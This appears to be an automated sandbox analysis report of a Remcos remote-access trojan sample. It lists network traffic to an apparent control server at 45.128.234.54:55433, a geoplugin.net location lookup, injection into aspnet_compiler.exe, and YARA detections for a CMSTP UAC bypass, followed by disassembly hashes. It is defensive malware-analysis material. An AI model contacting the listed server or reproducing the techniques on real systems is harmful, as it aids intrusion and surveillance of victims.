                  Jun 6, 2023 17:18:27.316764116 CEST4969455433192.168.2.410.11.0.5
                  Jun 6, 2023 17:18:30.322700024 CEST4969455433192.168.2.410.11.0.5
                  Jun 6, 2023 17:18:36.354473114 CEST4969455433192.168.2.410.11.0.5
                  Jun 6, 2023 17:18:48.361797094 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.391845942 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:48.392015934 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.413088083 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.452032089 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:48.496220112 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.522089958 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:48.536987066 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.625186920 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:48.625369072 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:48.693269014 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:49.297676086 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:49.301040888 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:49.348654032 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:49.402436972 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:49.540925980 CEST4969980192.168.2.4178.237.33.50
                  Jun 6, 2023 17:18:49.565812111 CEST8049699178.237.33.50192.168.2.4
                  Jun 6, 2023 17:18:49.565912008 CEST4969980192.168.2.4178.237.33.50
                  Jun 6, 2023 17:18:49.566293001 CEST4969980192.168.2.4178.237.33.50
                  Jun 6, 2023 17:18:49.598249912 CEST8049699178.237.33.50192.168.2.4
                  Jun 6, 2023 17:18:49.598454952 CEST4969980192.168.2.4178.237.33.50
                  Jun 6, 2023 17:18:49.665569067 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:18:49.732357979 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:18:50.597860098 CEST8049699178.237.33.50192.168.2.4
                  Jun 6, 2023 17:18:50.597980022 CEST4969980192.168.2.4178.237.33.50
                  Jun 6, 2023 17:19:07.185269117 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:19:07.188301086 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:19:07.265501022 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:19:37.214919090 CEST554334969845.128.234.54192.168.2.4
                  Jun 6, 2023 17:19:37.218048096 CEST4969855433192.168.2.445.128.234.54
                  Jun 6, 2023 17:19:37.287739038 CEST554334969845.128.234.54192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jun 6, 2023 17:18:49.507006884 CEST5223953192.168.2.48.8.8.8
                  Jun 6, 2023 17:18:49.527475119 CEST53522398.8.8.8192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jun 6, 2023 17:18:49.507006884 CEST192.168.2.48.8.8.80xc59aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jun 6, 2023 17:18:49.527475119 CEST8.8.8.8192.168.2.40xc59aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • geoplugin.net

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449699178.237.33.5080C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampkBytes transferredDirectionData
                  Jun 6, 2023 17:18:49.566293001 CEST42OUTGET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jun 6, 2023 17:18:49.598249912 CEST44INHTTP/1.1 200 OK
                  date: Tue, 06 Jun 2023 15:18:49 GMT
                  server: Apache
                  content-length: 944
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 30 34 35 0a 7d
                  Data Ascii: { "geoplugin_request":"102.129.143.77", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9045}


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:17:17:57
                  Start date:06/06/2023
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\file.exe
                  Imagebase:0x177e97b0000
                  File size:585216 bytes
                  MD5 hash:58A91896EAF6EFE03FFE6EBB7B731792
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  General

                  Target ID:1
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x60000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:2
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x250000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:3
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x420000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:4
                  Start time:17:18:04
                  Start date:06/06/2023
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Imagebase:0x890000
                  File size:55400 bytes
                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 00007FF814F2198C Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: %$g[s
                    • API String ID: 0-2818602941
                    • Opcode ID: 388d08ca8fbdc16dbe8e49be8904ad53c85c2083cdf4c24348e787b98028f9a5
                    • Instruction ID: 7e07f105fd7f25cdcb0f4d886b2c908dee5c3d24daa55121f9ea9bba769d0a88
                    • Opcode Fuzzy Hash: 388d08ca8fbdc16dbe8e49be8904ad53c85c2083cdf4c24348e787b98028f9a5
                    • Instruction Fuzzy Hash: 41118971D14A1D8FEBA4DB28D899BA9B7B1FB14340F5046FA900DE3252DE345AC5CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F24ACC Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 2
                    • API String ID: 0-450215437
                    • Opcode ID: 0c8710ddd3d4e56a86cf6261f8225d7f9afef404df5168e53af1bc5d516da44e
                    • Instruction ID: ad2499aca4475e012535195ae9a294f731554bd72952cd38cc367a1af143e139
                    • Opcode Fuzzy Hash: 0c8710ddd3d4e56a86cf6261f8225d7f9afef404df5168e53af1bc5d516da44e
                    • Instruction Fuzzy Hash: D4322A71E0891D8FDB98DB18D898BA9B7B1FF59351F5042E9C00EE7292CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F213E3 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: jtr
                    • API String ID: 0-3145851702
                    • Opcode ID: 9ea4850c6a6a1e2834571244b66c156cf1a9144be5a094142717fae140c70a1b
                    • Instruction ID: ef5dac52d0325011d421e73831b0926849bd350e52d6ed05106de49f560b0356
                    • Opcode Fuzzy Hash: 9ea4850c6a6a1e2834571244b66c156cf1a9144be5a094142717fae140c70a1b
                    • Instruction Fuzzy Hash: 23014071D09E498EE754DF54E894AEEB7B2FB96361F10437AC00D97781DA385984CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F209F1 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: /
                    • API String ID: 0-2043925204
                    • Opcode ID: 80821b8615f60b33969dfe10c546349ac63ce98f465b16b9f8517a1d02a92454
                    • Instruction ID: 5ca5a836a994edbacdc74beca14679f02db4250700952ed97e2351bdf75e401f
                    • Opcode Fuzzy Hash: 80821b8615f60b33969dfe10c546349ac63ce98f465b16b9f8517a1d02a92454
                    • Instruction Fuzzy Hash: 3EF054B2D0491DDEE794DB54A8997E8B6B2FB58350F0042BAC10DD3282CE345980CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2491D Relevance: .6, Instructions: 623COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4771880aa4186520f97962c8a44d06758f03c828dfef2fb0afb0f32281ae7798
                    • Instruction ID: ade63ae0d03ec7c981009a1077db71a8231f17aafcbeed1e455297dfa0714f2b
                    • Opcode Fuzzy Hash: 4771880aa4186520f97962c8a44d06758f03c828dfef2fb0afb0f32281ae7798
                    • Instruction Fuzzy Hash: 9432C97090891D8FDB94EF18D899BA9B7B1FF99355F1042E9D00DE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F258B9 Relevance: .3, Instructions: 303COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e83a5023aa7b1a7a4d857e49fa10480c4e63879604d8c652dbc3a3ecc9cbc44
                    • Instruction ID: 290c89fb1987c938147725393c8fd3503841b02cf6a93192a9b354e63fb09af1
                    • Opcode Fuzzy Hash: 9e83a5023aa7b1a7a4d857e49fa10480c4e63879604d8c652dbc3a3ecc9cbc44
                    • Instruction Fuzzy Hash: E4C1C871D0891D8FEB98DB18D898BA9B7B1FF95351F5442E9C00EE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25A10 Relevance: .2, Instructions: 238COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7a584d5e8c3e839a2113cb97bd4397278cc6dea955282e9f11f9fac5beaecc9
                    • Instruction ID: 5f64ba81ff7e4d739899ee86e373ad509dbb8a25623562585a22b6551d9e4815
                    • Opcode Fuzzy Hash: f7a584d5e8c3e839a2113cb97bd4397278cc6dea955282e9f11f9fac5beaecc9
                    • Instruction Fuzzy Hash: EA91B975D0891D8FEBA4DF18D898BA9B7B1FB99345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2580A Relevance: .2, Instructions: 221COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ceac443585823d3c0dfbba976a30702946df7578a3494eb6d2567900818209ef
                    • Instruction ID: 0dc61bc2a6b5c6d7fbe04dc3a398a69f9c8fbde68ede5e0ded5698c38ea7b55b
                    • Opcode Fuzzy Hash: ceac443585823d3c0dfbba976a30702946df7578a3494eb6d2567900818209ef
                    • Instruction Fuzzy Hash: 7781D871D1891D8FEBA4DB18D898BA9B7B1FF95351F5042E9C00EE72A1CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F27E12 Relevance: .2, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e35c3a0b95cfe40edf966310e573917f0a1676071d566b4ca7ddba2bf14aa3c
                    • Instruction ID: 6c134adb90789cd00625d14c88eb297c1781a9a76c68e15f27cf35a7d3230416
                    • Opcode Fuzzy Hash: 1e35c3a0b95cfe40edf966310e573917f0a1676071d566b4ca7ddba2bf14aa3c
                    • Instruction Fuzzy Hash: 3A71E872D1CA4A8FE795DA68A891ABDBBF0EF463A0F04017AC05DD73D2DB286845C351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F259E1 Relevance: .2, Instructions: 213COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c84d0f7fc0d81f4926fcee97f088cfe56090975142c6bbe5b8db66a8590eb93
                    • Instruction ID: e04f02bc1db1d1b156ed54c689d240b69488d8795cb4a4a3db7b9563c25ecd18
                    • Opcode Fuzzy Hash: 5c84d0f7fc0d81f4926fcee97f088cfe56090975142c6bbe5b8db66a8590eb93
                    • Instruction Fuzzy Hash: 8E81A875D0891D8FEBA4DF18D898BA9B7B2FB99345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25AD2 Relevance: .2, Instructions: 207COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50ae3aa7ccdd080be01fdd1c1102ca054dc6fb7a00bef87e0d7703a3d56d95d7
                    • Instruction ID: 710f3e509a12d8327af6c0275a1e707614cc01ede2969fd22c56a3f0c6b57e63
                    • Opcode Fuzzy Hash: 50ae3aa7ccdd080be01fdd1c1102ca054dc6fb7a00bef87e0d7703a3d56d95d7
                    • Instruction Fuzzy Hash: 2081B771D1891D8FEBA8EB18D899BA9B7B1FF95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25B47 Relevance: .2, Instructions: 207COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9fd419cdfda2d0ab15a79ab81d8e6dd9dda4476e20c8e8a4cf48986cfceffe22
                    • Instruction ID: b586f2e4d0954a5ce5d7d78150a57292120fbefe80f41f7d110afb4039635229
                    • Opcode Fuzzy Hash: 9fd419cdfda2d0ab15a79ab81d8e6dd9dda4476e20c8e8a4cf48986cfceffe22
                    • Instruction Fuzzy Hash: BE81B771D1891D8FEBA8EB18D898BA9B7B1FF95345F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25C1A Relevance: .2, Instructions: 206COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b2f2086cdbcc430c170edcaedb74787b1049026b6ff214a24173a86f5ddc8cb
                    • Instruction ID: 08ed4b4a0797adbf584529d0bdcf5e9772f1a48f203c210f49e20fd1c5da2e4b
                    • Opcode Fuzzy Hash: 5b2f2086cdbcc430c170edcaedb74787b1049026b6ff214a24173a86f5ddc8cb
                    • Instruction Fuzzy Hash: 5981A871D1891D8FEBA4EF18D898BA9B7B2FB95341F5042E9C00DE7265CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25AE5 Relevance: .2, Instructions: 203COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction ID: 50ec1deaf5f02d7fb84cced2ef27a5609f744d0e236149493616f120879caf5b
                    • Opcode Fuzzy Hash: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction Fuzzy Hash: 3E81B771D1891D8FEBA8EF18D898BA9B7B1FB95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F25B5A Relevance: .2, Instructions: 203COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction ID: 50ec1deaf5f02d7fb84cced2ef27a5609f744d0e236149493616f120879caf5b
                    • Opcode Fuzzy Hash: 9816292386ef4d7e091dbf36d0a022cd704252046befde2c2d637dce79d3ef30
                    • Instruction Fuzzy Hash: 3E81B771D1891D8FEBA8EF18D898BA9B7B1FB95341F5042E9C00DE7261CA35AD81CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F26FD0 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 76bdff1c44b5d445bcb78dd0168b81ee12c214fbbfed2e4d07f5d40e2003d18b
                    • Instruction ID: 2d72c3c920cca918e983964bcad0f9ee7870420b2262b93650707e9fa9bd2add
                    • Opcode Fuzzy Hash: 76bdff1c44b5d445bcb78dd0168b81ee12c214fbbfed2e4d07f5d40e2003d18b
                    • Instruction Fuzzy Hash: 26216B7190D6498FEB19DB50E4949ECBBB1EF1A350F1001AEC04EAB3A2CA78A844CB11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2B757 Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
